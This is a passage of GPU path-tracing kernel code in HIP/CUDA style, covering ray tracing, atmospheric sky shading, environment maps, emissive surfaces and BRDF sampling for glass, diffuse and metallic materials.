global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int state = ray_state[RS_STATE]; if (state != STATE_SECONDARY) { return; } float o[3], d[3]; d[0] = ray_state[RS_DIR_X]; d[1] = ray_state[RS_DIR_Y]; d[2] = ray_state[RS_DIR_Z]; o[0] = ray_state[RS_ORIGIN_X] + (d[0] * EPSILON); o[1] = ray_state[RS_ORIGIN_Y] + (d[1] * EPSILON); o[2] = ray_state[RS_ORIGIN_Z] + (d[2] * EPSILON); TRACE(use_triangles_image, use_nodes_image, false); } /// __global__ void EnvSky(float* ray_state, hipTextureObject_t sun_table, Sun sun, int32_t width, int32_t height, int32_t bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_ENVIRONMENT) { return; } float brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; float d_i[3]; d_i[0] = ray_state[RS_DIR_X]; d_i[1] = ray_state[RS_DIR_Y]; d_i[2] = ray_state[RS_DIR_Z]; float s = -6360.5f * d_i[1]; float mu = -s * 0.00015722034f; float nu = d_i[0] * sun.direction[0] + d_i[1] * sun.direction[1] + d_i[2] * sun.direction[2]; float mus = (6360.5f * sun.direction[1]) * 0.00015722034f; float rmu = 6360.5f * mu; float delta = rmu * rmu - 6360.25f; float4 cst; if ((rmu < 0.0f) && (delta > 0.0f)) { cst = make_float4(1.0f, 0.0f, 0.0f, 0.484375f); } else { cst = make_float4(-1.0f, 766800.000001f, 875.67117116f, 0.515625f); } float umu = cst.w + (rmu * cst.x + sqrt(delta + cst.y)) / (79.7511755399f + cst.z) * 0.4921875f; float umus = 0.015625f + (atan(fmax(mus, -0.1975f) * 5.34962349919f) * 0.90909090f + 0.74f) * 0.484375f; float lerp_value = (nu + 1.0f) * 3.5f; float unu = floor(lerp_value); lerp_value = lerp_value - unu; float2 uv0 = make_float2((unu + umus) * 0.125f, umu); float2 uv1 = make_float2((unu + umus + 1.0f) * 0.125f, umu); float4 raymie = fmax((tex2D<float4>(sun_table, uv0.x, uv0.y) * (1.0f - lerp_value)) + (tex2D<float4>(sun_table, uv1.x, uv1.y) * lerp_value), make_float4(0.0f)); float pr = 0.05968310365f * (1.0f + nu * nu); float pm = 0.04297183463f * pow(1.64f - 1.6f * nu, -1.5f) * (1.0f + nu * nu) * 0.378378378f; float4 beta_r = make_float4(0.0058f, 0.0135f, 0.0331f, 1.0f); float4 mie = raymie * raymie.w / (raymie.x) * (beta_r.x / beta_r) * \ (1.0f + (d_i[1] * 3.0f)); float4 result = fmax(raymie * pr + mie * pm, make_float4(0.0f)) * 30.0f * sun.sky_intensity; float sun_delta = sun.direction[0] * d_i[0] + sun.direction[1] * d_i[1] + sun.direction[2] * d_i[2]; float color[3] = { result.x, result.y, result.z }; float mis = 1.0f; if ((brdf_pdf != -1.0f) && (sun_delta >= SUN_COS_THETA)) { float sun_pdf = 1.0f / (TAU * (1.0f - SUN_COS_THETA)); if (bounce > 0) { if (brdf_pdf < DIRAC_PDF) { if (sun.sun_intensity > 0.0f) { mis = MIS(brdf_pdf, sun_pdf); } else { sun.sun_intensity *= 0.05f; } } else { if (bounce > 5) { ray_state[RS_STATE] = STATE_END; return; } sun.sun_intensity *= 0.05f; } } else { sun.sun_intensity *= 0.05f; } float horizon_falloff = fabs(d_i[1] - 0.075f) - (d_i[1] - 0.075f); horizon_falloff = pow(horizon_falloff, 4.0f); float hfo = horizon_falloff * 1000.0f; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float multiplier = clamp(1.0f / NOT_ZERO(hfo), 1.0f, fmax(5.0f, sun.sun_intensity * 100.0f)); color[0] *= multiplier; color[1] *= multiplier; color[2] *= multiplier; } else if (bounce > 0) { float horizon_bias = fmin(0.5f, (fmax(0.0f, sun.direction[1] - 0.1f) * 10.0f)); float max_component = fmax(color[0], fmax(color[1], color[2])); color[0] = lerp(color[0], max_component * 1.0f, horizon_bias); color[1] = lerp(color[1], max_component * 0.98f, horizon_bias); color[2] = lerp(color[2], max_component * 0.73f, horizon_bias); color[0] *= sun.color[0]; color[1] *= sun.color[1]; color[2] *= sun.color[2]; } ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * color[0] * mis; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * color[1] * mis; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * color[2] * mis; ray_state[RS_STATE] = STATE_END; return; } /// __global__ void EnvMap(float* ray_state, hipTextureObject_t environment_map, EnvironmentProperties environment_properties, int width, int height, int bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_ENVIRONMENT) { return; } float d_i[3]; d_i[0] = ray_state[RS_DIR_X]; d_i[1] = ray_state[RS_DIR_Y]; d_i[2] = ray_state[RS_DIR_Z]; NORMALIZE(d_i); float2 uv = make_float2(1.0f + atan2(d_i[0], -d_i[2]), acos(-d_i[1]) * INV_PI); uv.x *= INV_TAU; uv.x += environment_properties.rotation; float4 color = tex2D<float4>(environment_map, uv.x, uv.y); color.x *= environment_properties.intensity; color.y *= environment_properties.intensity; color.z *= environment_properties.intensity; ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * color.x; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * color.y; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * color.z; ray_state[RS_STATE] = STATE_END; return; } /// __global__ void Emission(float* ray_state, Material* materials, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t emission_atlas, int32_t emitter_count, int width, int height, int bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_EMISSIVE) { return; } float d[3]; d[0] = ray_state[RS_DIR_X]; d[1] = ray_state[RS_DIR_Y]; d[2] = ray_state[RS_DIR_Z]; float u = ray_state[RS_U]; float v = ray_state[RS_V]; float w = 1.0f - u - v; int tri_index = ray_state[RS_TRI_INDEX]; uint32_t tri_pixel = tri_index * 42; float vn[3]; if (use_triangles_image) { vn[0] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2); vn[1] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); vn[2] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { vn[0] = w * triangles[tri_index].vertex_normals[0][0] + u * triangles[tri_index].vertex_normals[1][0] + v * triangles[tri_index].vertex_normals[2][0]; vn[1] = w * triangles[tri_index].vertex_normals[0][1] + u * triangles[tri_index].vertex_normals[1][1] + v * triangles[tri_index].vertex_normals[2][1]; vn[2] = w * triangles[tri_index].vertex_normals[0][2] + u * triangles[tri_index].vertex_normals[1][2] + v * triangles[tri_index].vertex_normals[2][2]; } NORMALIZE(vn); float dot_ni = DOT(-d, vn); if (dot_ni <= 0.0f) { ray_state[RS_STATE] = STATE_END; return; } else { uint mat_id; float uv[2]; float inverse_area; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); uv[0] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2); uv[1] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); inverse_area = tex1Dfetch<float>(triangles_image, TRI_INV_AREA); } else { mat_id = triangles[tri_index].material_id; uv[0] = w * triangles[tri_index].vertex_uvs[0][0] + u * triangles[tri_index].vertex_uvs[1][0] + v * triangles[tri_index].vertex_uvs[2][0]; uv[1] = w * triangles[tri_index].vertex_uvs[0][1] + u * triangles[tri_index].vertex_uvs[1][1] + v * triangles[tri_index].vertex_uvs[2][1]; inverse_area = triangles[tri_index].inverse_area; } float t = ray_state[RS_HIT_DISTANCE]; float t_2 = t * t; float emitter_color[3]; float intensity = materials[mat_id].emission * 25.0f; if (materials[mat_id].map_flags & MAP_FLAG_EMISSION) { float2 emission_uv; emission_uv.x = uv[0]; emission_uv.y = uv[1]; emission_uv.x = lerp(materials[mat_id].emission_bounds[0] + 0.5f, materials[mat_id].emission_bounds[1] - 0.5f, emission_uv.x); emission_uv.y = lerp(materials[mat_id].emission_bounds[2] + 0.5f, materials[mat_id].emission_bounds[3] - 0.5f, emission_uv.y); float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, emission_uv.y); emitter_color[0] = emission_map.y * intensity; emitter_color[1] = emission_map.z * intensity; emitter_color[2] = emission_map.w * intensity; } else { emitter_color[0] = materials[mat_id].albedo[0] * intensity; emitter_color[1] = materials[mat_id].albedo[1] * intensity; emitter_color[2] = materials[mat_id].albedo[2] * intensity; } float brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; if (brdf_pdf == -1.0f) { ray_state[RS_STATE] = STATE_END; return; } float emitter_prob = 1.0f / (float)emitter_count; float emitter_pdf = inverse_area * (t_2 / fabs(dot_ni)) * emitter_prob; float mis = 1.0f; if (bounce > 0) { if (brdf_pdf < DIRAC_PDF) { mis = MIS(brdf_pdf, emitter_pdf); } else if (bounce > 5) { ray_state[RS_STATE] = STATE_END; return; } } ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * emitter_color[0] * mis; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * emitter_color[1] * mis; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * emitter_color[2] * mis; ray_state[RS_STATE] = STATE_END; return; } } /// __global__ void Sample(float* ray_state, Material* materials, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t albedo_atlas, hipTextureObject_t normal_atlas, hipTextureObject_t metallic_atlas, hipTextureObject_t emission_atlas, hipTextureObject_t sun_table, Sun sun, hipTextureObject_t environment_map, EnvironmentProperties environment_properties, EmitterIndex* emitters, int32_t emitter_count, PortalIndex* portals, int32_t portal_count, uint4 b_seeds_0, uint4 b_seeds_1, uint4 b_seeds_2, uint4 b_seeds_3, int32_t width, int32_t height, int32_t sample_sun) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state == STATE_END) { return; } float last_brdf_pdf; float new_brdf_pdf; float sn[3]; float vn[3]; float n[3]; float n_tangent[3]; float n_binormal[3]; float ld_i[3]; float old_throughput[3]; float albedo[3]; float metallic; float smoothness; bool glass_material; { float u = ray_state[RS_U]; float v = ray_state[RS_V]; float w = 1.0f - u - v; uint32_t tri_index = ray_state[RS_TRI_INDEX]; uint32_t tri_pixel = tri_index * 42; uint32_t mat_id; float uv[2]; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); sn[0] = tex1Dfetch<float>(triangles_image, TRI_SURF_N); sn[1] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 1); sn[2] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 2); uv[0] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2); uv[1] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); vn[0] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2); vn[1] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); vn[2] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { mat_id = triangles[tri_index].material_id; sn[0] = triangles[tri_index].surface_normal[0]; sn[1] = triangles[tri_index].surface_normal[1]; sn[2] = triangles[tri_index].surface_normal[2]; uv[0] = w * triangles[tri_index].vertex_uvs[0][0] + u * triangles[tri_index].vertex_uvs[1][0] + v * triangles[tri_index].vertex_uvs[2][0]; uv[1] = w * triangles[tri_index].vertex_uvs[0][1] + u * triangles[tri_index].vertex_uvs[1][1] + v * triangles[tri_index].vertex_uvs[2][1]; vn[0] = w * triangles[tri_index].vertex_normals[0][0] + u * triangles[tri_index].vertex_normals[1][0] + v * triangles[tri_index].vertex_normals[2][0]; vn[1] = w * triangles[tri_index].vertex_normals[0][1] + u * triangles[tri_index].vertex_normals[1][1] + v * triangles[tri_index].vertex_normals[2][1]; vn[2] = w * triangles[tri_index].vertex_normals[0][2] + u * triangles[tri_index].vertex_normals[1][2] + v * triangles[tri_index].vertex_normals[2][2]; } glass_material = (materials[mat_id].glass > 0.0f); float d_i[3]; d_i[0] = -ray_state[RS_DIR_X]; d_i[1] = -ray_state[RS_DIR_Y]; d_i[2] = -ray_state[RS_DIR_Z]; albedo[0] = materials[mat_id].albedo[0]; albedo[1] = materials[mat_id].albedo[1]; albedo[2] = materials[mat_id].albedo[2]; if (materials[mat_id].map_flags & MAP_FLAG_ALBEDO) { float2 albedo_uv; albedo_uv.x = uv[0]; albedo_uv.y = uv[1]; albedo_uv.x = lerp(materials[mat_id].albedo_bounds[0] + 0.5f, materials[mat_id].albedo_bounds[1] - 0.5f, albedo_uv.x); albedo_uv.y = lerp(materials[mat_id].albedo_bounds[2] + 0.5f, materials[mat_id].albedo_bounds[3] - 0.5f, albedo_uv.y); float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, albedo_uv.y); albedo[0] *= albedo_map.y; albedo[1] *= albedo_map.z; albedo[2] *= albedo_map.w; } if (materials[mat_id].map_flags & MAP_FLAG_NORMAL) { float2 normal_uv; normal_uv.x = uv[0]; normal_uv.y = uv[1]; normal_uv.x = lerp(materials[mat_id].normal_bounds[0] + 0.5f, materials[mat_id].normal_bounds[1] - 0.5f, normal_uv.x); normal_uv.y = lerp(materials[mat_id].normal_bounds[2] + 0.5f, materials[mat_id].normal_bounds[3] - 0.5f, normal_uv.y); float4 normal_map = tex2D<float4>(normal_atlas, normal_uv.x, normal_uv.y); float vn_tangent[3], vn_binormal[3]; GET_VT_BASIS(vn, vn_tangent, vn_binormal); float ln[3]; ln[0] = normal_map.x * 2.0f - 1.0f; ln[1] = normal_map.z * 2.0f - 1.0f; ln[2] = sqrt(1.0f - saturate(ln[0] * ln[0] + ln[1] * ln[1])); ROTATE_TO_BASIS(ln, vn, vn_tangent, vn_binormal, n); } else { n[0] = vn[0]; n[1] = vn[1]; n[2] = vn[2]; } NORMALIZE(n); if (!glass_material && (DOT(d_i, sn) < 0.0f)) { n[0] = -n[0]; n[1] = -n[1]; n[2] = -n[2]; } metallic = materials[mat_id].metallic; smoothness = materials[mat_id].smoothness; if (materials[mat_id].map_flags & MAP_FLAG_METALLIC) { float2 metallic_uv; metallic_uv.x = uv[0]; metallic_uv.y = uv[1]; metallic_uv.x = lerp(materials[mat_id].metallic_bounds[0] + 0.5f, materials[mat_id].metallic_bounds[1] - 0.5f, metallic_uv.x); metallic_uv.y = lerp(materials[mat_id].metallic_bounds[2] + 0.5f, materials[mat_id].metallic_bounds[3] - 0.5f, metallic_uv.y); float4 metallic_map = tex2D<float4>(metallic_atlas, metallic_uv.x, metallic_uv.y); metallic *= metallic_map.y; smoothness *= metallic_map.x; } float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; GET_BASIS(n, n_tangent, n_binormal); RELATIVE_TO_BASIS(d_i, n, n_tangent, n_binormal, ld_i); float ggx_pdf; float ln_facet[3]; if (smoothness == 1.0f) { ln_facet[0] = 0.0f; ln_facet[1] = 0.0f; ln_facet[2] = 1.0f; ggx_pdf = DIRAC_PDF; } else { float ggx_samples[2]; PRNG(global_id, b_seeds_0.x, ggx_samples[0]); PRNG(global_id, b_seeds_0.y, ggx_samples[1]); GGX_SAMPLE(ld_i, roughness, ggx_samples[0], ggx_samples[1], ln_facet); float g1, eval; SMITH_G1(ld_i, ln_facet, roughness, g1); GGX_EVAL(ln_facet, roughness, eval); ggx_pdf = g1 * fabs(DOT(ld_i, ln_facet)) * eval / fabs(ld_i[2]); } if (ld_i[2] == 0.0f) { ggx_pdf = 0.0f; } last_brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float brdf_color[3]; float ld_o[3]; float sample_dice; PRNG(global_id, b_seeds_0.z, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface float fresnel, cos_theta_t; DIELECTRIC_FRESNEL(ld_i[2], 1.5f, cos_theta_t, fresnel); float reflect_sample; PRNG(global_id, b_seeds_0.w, reflect_sample); if (reflect_sample <= (fresnel * coating_dropoff)) { // Reflect float dot_ni = DOT(ln_facet, ld_i); ld_o[0] = 2.0f * ln_facet[0] * dot_ni - ld_i[0]; ld_o[1] = 2.0f * ln_facet[1] * dot_ni - ld_i[1]; ld_o[2] = 2.0f * ln_facet[2] * dot_ni - ld_i[2]; ld_o[2] = fabs(ld_o[2]); NORMALIZE(ld_o); if ((ggx_pdf == 0.0f) || (ld_o[2] <= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { brdf_color[0] = 1.0f; brdf_color[1] = 1.0f; brdf_color[2] = 1.0f; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { new_brdf_pdf = ggx_pdf; new_brdf_pdf *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); new_brdf_pdf *= fabs(dwh_dwo); } } } } else { // Transmit if (glass_material) { // Refract float ior = (cos_theta_t < 0.0f) ? (1.0f / 1.5f) : 1.5f; float ior_2 = ior * ior; float dot_ni = DOT(ln_facet, ld_i); float c = dot_ni * ior + cos_theta_t; ld_o[0] = ln_facet[0] * c - ld_i[0] * ior; ld_o[1] = ln_facet[1] * c - ld_i[1] * ior; ld_o[2] = ln_facet[2] * c - ld_i[2] * ior; copysign(ld_o[2], -ld_o[1]); NORMALIZE(ld_o); if ((cos_theta_t == 0.0f) || (ld_i[2] * ld_o[2] >= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { brdf_color[0] = albedo[0] * ior_2; brdf_color[1] = albedo[1] * ior_2; brdf_color[2] = albedo[2] * ior_2; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { float dot_no = DOT(ln_facet, ld_o); new_brdf_pdf = ggx_pdf; float sqrt_denom = dot_ni + ior * dot_no; float dwh_dwo = (ior_2 * dot_no) / (sqrt_denom * sqrt_denom); new_brdf_pdf *= fabs(dwh_dwo); } } } } else { // Diffuse ln_facet[0] = 0.0f; ln_facet[1] = 0.0f; ln_facet[2] = 1.0f; float ln_tangent[3]; float ln_binormal[3]; GET_BASIS(ln_facet, ln_tangent, ln_binormal); float hemi_sample[2]; PRNG(global_id, b_seeds_1.x, hemi_sample[0]); PRNG(global_id, b_seeds_1.y, hemi_sample[1]); float hemi_d[3]; CONCENTRIC_HEMI(hemi_sample[0], hemi_sample[1], hemi_d); ROTATE_TO_BASIS(hemi_d, ln_facet, ln_tangent, ln_binormal, ld_o); ld_o[2] = fabs(ld_o[2]); brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; new_brdf_pdf = INV_PI * ld_o[2]; } } } else { // Conductor float dot_ni = DOT(ln_facet, ld_i); ld_o[0] = 2.0f * ln_facet[0] * dot_ni - ld_i[0]; ld_o[1] = 2.0f * ln_facet[1] * dot_ni - ld_i[1]; ld_o[2] = 2.0f * ln_facet[2] * dot_ni - ld_i[2]; ld_o[2] = fabs(ld_o[2]); NORMALIZE(ld_o); if ((ggx_pdf == 0.0f) || (ld_o[2] <= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { float f; CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); brdf_color[0] = albedo[0] * f; brdf_color[1] = albedo[1] * f; brdf_color[2] = albedo[2] * f; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { new_brdf_pdf = ggx_pdf / (4.0f * DOT(ld_o, ln_facet)); } } } } float d_o[3]; ROTATE_TO_BASIS(ld_o, n, n_tangent, n_binormal, d_o); ray_state[RS_LAST_BRDF_PDF] = new_brdf_pdf; old_throughput[0] = ray_state[RS_THROUGHPUT_R]; old_throughput[1] = ray_state[RS_THROUGHPUT_G]; old_throughput[2] = ray_state[RS_THROUGHPUT_B]; ray_state[RS_THROUGHPUT_R] = old_throughput[0] * brdf_color[0]; ray_state[RS_THROUGHPUT_G] = old_throughput[1] * brdf_color[1]; ray_state[RS_THROUGHPUT_B] = old_throughput[2] * brdf_color[2]; ray_state[RS_DIR_X] = d_o[0]; ray_state[RS_DIR_Y] = d_o[1]; ray_state[RS_DIR_Z] = d_o[2]; ray_state[RS_STATE] = STATE_SECONDARY; } float sun_d[3]; sun_d[0] = FLT_MAX; if (sample_sun > 0) { float theta, z; PRNG(global_id, b_seeds_1.z, theta); PRNG(global_id, b_seeds_1.w, z); theta *= TAU; z = (z * (1.0f - SUN_COS_THETA)) + SUN_COS_THETA; float z2 = sqrt(1.0f - (z * z)); float sun_ld_o[3]; sun_ld_o[0] = z2 * cos(theta); sun_ld_o[1] = z2 * sin(theta); sun_ld_o[2] = z; float sun_tangent[3]; float sun_binormal[3]; GET_BASIS(sun.direction, sun_tangent, sun_binormal); ROTATE_TO_BASIS(sun_ld_o, sun.direction, sun_tangent, sun_binormal, sun_d); sun_d[1] = fmax(0.01f, sun_d[1]); NORMALIZE(sun_d); float cos_at_tri = DOT(sun_d, n); if (cos_at_tri <= 0.0f) { sun_d[0] = FLT_MAX; } else { float sun_color[3]; float brdf_color[3]; float brdf_pdf; float sun_pdf = 1.0f / (TAU * (1.0f - SUN_COS_THETA)); float s = -6360.5f * sun_d[1]; float mu = -s * 0.00015722034f; float nu = sun_d[0] * sun.direction[0] + sun_d[1] * sun.direction[1] + sun_d[2] * sun.direction[2]; float mus = (6360.5f * sun.direction[1]) * 0.00015722034f; float rmu = 6360.5f * mu; float delta = rmu * rmu - 6360.25f; float4 cst; if ((rmu < 0.0f) && (delta > 0.0f)) { cst = make_float4(1.0f, 0.0f, 0.0f, 0.484375f); } else { cst = make_float4(-1.0f, 766800.000001f, 875.67117116f, 0.515625f); } float umu = cst.w + (rmu * cst.x + sqrt(delta + cst.y)) / (79.7511755399f + cst.z) * 0.4921875f; float umus = 0.015625f + (atan(fmax(mus, -0.1975f) * 5.34962349919f) * 0.90909090f + 0.74f) * 0.484375f; float lerp_value = (nu + 1.0f) * 3.5f; float unu = floor(lerp_value); lerp_value = lerp_value - unu; float2 uv0 = make_float2((unu + umus) * 0.125f, umu); float2 uv1 = make_float2((unu + umus + 1.0f) * 0.125f, umu); float4 raymie = fmax((tex2D<float4>(sun_table, uv0.x, uv0.y) * (1.0f - lerp_value)) + (tex2D<float4>(sun_table, uv1.x, uv1.y) * lerp_value), make_float4(0.0f)); float pr = 0.05968310365f * (1.0f + nu * nu); float pm = 0.04297183463f * pow(1.64f - 1.6f * nu, -1.5f) * (1.0f + nu * nu) * 0.378378378f; float4 beta_r = make_float4(0.0058f, 0.0135f, 0.0331f, 1.0f); float4 mie = raymie * raymie.w / NOT_ZERO(raymie.x) * (beta_r.x / beta_r); float4 sun_result = fmax(raymie * pr + mie * pm, make_float4(0.0f)) * 30.0f * sun.sky_intensity; sun_result.x *= sun.color[0]; sun_result.y *= sun.color[1]; sun_result.z *= sun.color[2]; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float horizon_falloff = fabs(sun_d[1] - 0.075f) - (sun_d[1] - 0.075f); horizon_falloff = pow(horizon_falloff, 4.0f); float hfo = horizon_falloff * 1000.0f; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float multiplier = clamp(1.0f / NOT_ZERO(hfo), 1.0f, fmax(5.0f, sun.sun_intensity * 100.0f)); sun_color[0] = sun_result.x * multiplier; sun_color[1] = sun_result.y * multiplier; sun_color[2] = sun_result.z * multiplier; float horizon_bias = fmin(0.5f, (fmax(0.0f, sun.direction[1] - 0.1f) * 10.0f)); float max_component = fmax(sun_color[0], fmax(sun_color[1], sun_color[2])); sun_color[0] = lerp(sun_color[0], max_component * 1.0f, horizon_bias); sun_color[1] = lerp(sun_color[1], max_component * 0.98f, horizon_bias); sun_color[2] = lerp(sun_color[2], max_component * 0.73f, horizon_bias); float ld_o[3]; RELATIVE_TO_BASIS(sun_d, n, n_tangent, n_binormal, ld_o); float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; float ln_facet[3]; ln_facet[0] = ld_i[0] + ld_o[0]; ln_facet[1] = ld_i[1] + ld_o[1]; ln_facet[2] = ld_i[2] + ld_o[2]; NORMALIZE(ln_facet); float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float sample_dice; PRNG(global_id, b_seeds_2.x, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface bool refract = glass_material && ((ld_i[2] * ld_o[2]) < 0.0f); if (refract) { // Refraction facet float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; ln_facet[0] = ld_i[0] + ld_o[0] * ior; ln_facet[1] = ld_i[1] + ld_o[1] * ior; ln_facet[2] = ld_i[2] + ld_o[2] * ior; NORMALIZE(ln_facet); } if (ln_facet[2] < 0.0f) { ln_facet[0] *= -1.0f; ln_facet[1] *= -1.0f; ln_facet[2] *= -1.0f; } float dot_ni = DOT(ld_i, ln_facet); float d, gi, go, g; GGX_EVAL(ln_facet, roughness, d); float cos_theta_t, fresnel; DIELECTRIC_FRESNEL(dot_ni, 1.5f, cos_theta_t, fresnel); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; if (!refract) { // Reflect/transmit to diffuse. float reflect_sample; PRNG(global_id, b_seeds_2.y, reflect_sample); if (glass_material || (reflect_sample <= (fresnel * coating_dropoff))) { // Reflection if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float model = fresnel * coating_dropoff * d * g / (4.0f * fabs(ld_i[2])); brdf_color[0] = model; brdf_color[1] = model; brdf_color[2] = model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); brdf_pdf = fabs(prob * dwh_dwo); } } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } else { // Transmit to diffuse brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; brdf_pdf = INV_PI * ld_o[2]; } } else { // Refraction if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; float dot_no = DOT(ln_facet, ld_o); float sqrt_denom = dot_ni + ior * dot_no; float model = ((1.0f - fresnel) * d * g * ior * ior * dot_ni * dot_no) / (ld_i[2] * sqrt_denom * sqrt_denom); model *= (ld_i[2] < 0.0f) ? 1.5f : (1.0f / 1.5f); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = (ior * ior * dot_no) / (sqrt_denom * sqrt_denom); brdf_pdf = fabs(prob * dwh_dwo); } } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } } else { // Conductor if 